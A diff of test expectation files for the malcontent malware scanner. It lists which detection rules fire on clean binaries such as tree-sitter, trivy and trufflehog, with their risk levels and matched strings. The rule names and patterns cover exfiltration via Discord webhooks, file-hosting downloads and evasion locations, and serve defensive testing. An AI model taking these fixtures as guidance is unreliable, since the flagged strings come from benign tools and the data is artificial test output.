+| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
+| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) |
+| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) |
+| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) |
+| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) |
+| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) |
+| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) |
+| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) |
+| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
+| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
+| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
+| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) |
+| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) |
+| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) |
+| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
+| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) |
+| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) |
+| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
+| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) |
+| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) |
+| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) |
+| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) |
+| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) |
+| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
+| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) |
+| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) |
+| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) |
+| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) |
+| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) |
+| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) |
+| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) |
+| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
+| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
+| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
+| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index cadf870be..90b8d4846 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -6,8 +6,8 @@
3P/threat_hunting/privilegeescalation: medium
c2/addr/http_dynamic: medium
c2/addr/ip: medium
+c2/addr/server: medium
c2/discovery/ip_dns_resolver: medium
-c2/server_address: medium
c2/tool_transfer/download: medium
c2/tool_transfer/github_raw: medium
collect/archives/unarchive: medium
@@ -53,18 +53,20 @@ discover/cloud/google_metadata: low
discover/cloud/google_storage: low
discover/network/mac_address: medium
discover/network/netstat: medium
+discover/process/name: medium
discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
evasion/bypass_security/linux/iptables: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/conditional/LANG: low
exec/dylib/symbol_address: medium
@@ -182,7 +184,6 @@ process/executable_path: low
process/groupid_set: low
process/groups_set: low
process/multithreaded: low
-process/name_get: medium
process/userid_set: low
sus/exclamation: medium
sus/intercept: medium
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index b356f137f..8389c0d6f 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -2,8 +2,8 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [https://api.lessannoyingcrm.com?UserCode=](https://api.lessannoyingcrm.com?UserCode=)
[https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.scraperapi.com?api_key=](https://api.scraperapi.com?api_key=)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous](https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://sslmate.com/api/v2/certs/example.com?expand=current](https://sslmate.com/api/v2/certs/example.com?expand=current)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) |
-| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com](https://github.com/search?q=pastebin.com&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) |
+| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) |
+| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) |
| HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) |
| HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) |
| HIGH | [exfil/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/discord.yara#discord_bot) | [Uses the Discord webhooks API](https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_high.yar#L706) | [discord.com/api/webhooks/](https://github.com/search?q=discord.com%2Fapi%2Fwebhooks%2F&type=code) |
@@ -25,6 +25,7 @@
| MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) |
